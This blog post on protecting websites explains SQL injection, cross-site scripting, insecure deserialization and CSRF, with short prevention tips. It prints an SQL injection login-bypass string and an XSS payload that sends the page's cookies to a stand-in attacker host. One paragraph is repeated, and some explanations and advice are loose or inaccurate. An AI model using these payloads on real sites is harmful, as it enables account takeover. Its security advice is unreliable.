Prevent your website from Hackers today
There are so many website which are venerable to hackers today. The truth is that no website can be 100 percent safe from hackers as they manipulate several ways to steal users data for different purposes. These are some common techniques in which your website can be attacked;
SQL Injection: SQL Injection is a situation whereby the hacker injects specially crafted SQL queries into your code to exploit improper input sanitization on the Backend of your website. Most time SQL is used to insert data, delete data, update data and fetch data from the database. For example you want to validate User Login on your website, you will perform the following queries;
"SELECT * FROM users WHERE username='$ username' AND password='$password'"
If the above query returns a row according to the user input then the query is valid else it is not valid. The user can then input an SQL statement such as
"SELECT * FROM users WHERE username='' OR 1=1 --' AND password='$password'"
The other part is commented out because of "--" and it will always return a row no matter what the user password is.
- Cross Site Scripting: On this attack the hacker injects some malicious scripts on the client's side (i.e the Browser). The hackers insert some malicious JavaScript code alongside with the user input and sent to the server and then to the database. By doing so, the hacker can; Steal Cookies, Deface a Website etc. For example the hacker might insert some script as below;
script> window.location="stealcookie.com/cookiestealer.php?cookie="+document.cookie; </script
- Cross Site Scripting: On this attack the hacker injects some malicious scripts on the client's side (i.e the Browser). The hackers insert some malicious JavaScript code alongside with the user input and sent to the server and then to the database. By doing so, the hacker can; Steal Cookies, Deface a Website etc. For example the hacker might insert some script as below;
By doing so the website cookies is compromised, which can lead to account take over.
- Insecure deserializing: Serializing is the process of converting data from one form to another so that both the sender and receiver can know how to handle it. When the browser sends data to the server, the server deserialise the data and also when the server sends data to the browser, the browser serialise it. When data is not properly validated from both the client's side and the server side, it might lead to loss of data.
- Cross Site Request Forgery: In this method, the hacker sends forged request to a target website from a different website, on the user's browser. This different website is a website hosted by the hacker himself. For instance, the hacker will create another form sent to the user, when the user changes his password it is thereby changed on the user database. The hacker can submit new record to the user's database with his own desired input value and then the user's data can be manipulated.
How to prevent these attacks
- SQL Injection: To prevent SQL injection, the user input must be first sanitized before confirming any SQL operation.
- Cross Site Scripting: To prevent this type of hacking, user input must be properly sanitized and validated before sending to the server.
- Insecure deserializing: To prevent this type of hacking, user data must be properly validated before sending to the server
- Cross Site Request Forgery: This can be prevented by implementing CSRF tokens to prevent CRSF loopholes.
Always remember that websites are created by developers and developers are human so they can always make mistake.
If you have any suggestion, question and contribution please do leave a comment below.
Twitter: @Joshuauzor